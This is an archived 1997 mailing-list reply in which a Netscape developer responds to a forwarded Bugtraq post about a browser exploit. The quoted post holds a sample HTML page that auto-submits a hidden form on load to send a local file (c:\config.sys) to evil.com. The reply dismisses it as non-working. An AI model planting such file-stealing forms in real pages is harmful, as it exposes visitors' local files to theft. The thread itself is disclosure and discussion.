[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Netscape Exploit

To: Lucky Green <[email protected]>
Subject: Re: Netscape Exploit
From: Tom Weinstein <[email protected]>
Date: Sun, 15 Jun 1997 01:30:31 -0700
CC: [email protected]
Organization: Netscape Communications, Inc.
References: <[email protected]>
Sender: [email protected]


Lucky Green wrote:
> 
> >Approved-By: [email protected]
> >Date:  Sat, 14 Jun 1997 19:21:30 -0500
> >Reply-To: root <[email protected]>
> >Sender: Bugtraq List <[email protected]>
> >From: root <[email protected]>
> >Subject:      Netscape Exploit
> >To: [email protected]
> >
> >Here is a sample it isn't complete but you get the basic idea of what
> is
> >going on
> ><HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
> >
> ><BODY onLoad="daForm.submit()">
> ><FORM
> >       NAME="daForm"
> >       ACTION="http://evil.com/cgi-bin/formmail.pl"
> >       METHOD=POST>
> >
> ><INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on
> your
> >Harddrive">
> ><INPUT TYPE=HIDDEN NAME="recipient" value="[email protected]">

Yeah, that's pretty cool.  Too bad it doesn't work.

-- 
What is appropriate for the master is not appropriate| Tom Weinstein
for the novice.  You must understand Tao before      | [email protected]
transcending structure.  -- The Tao of Programming   |

References:
- Netscape Exploit
  - From: Lucky Green <[email protected]>

Prev by Date: Re: We need more surveillance--a morality play about terrorism
Next by Date: Re: e$: Skins vs. Shirts
Prev by thread: Netscape Exploit
Next by thread: Re: Netscape Exploit
Index(es):
- Date
- Thread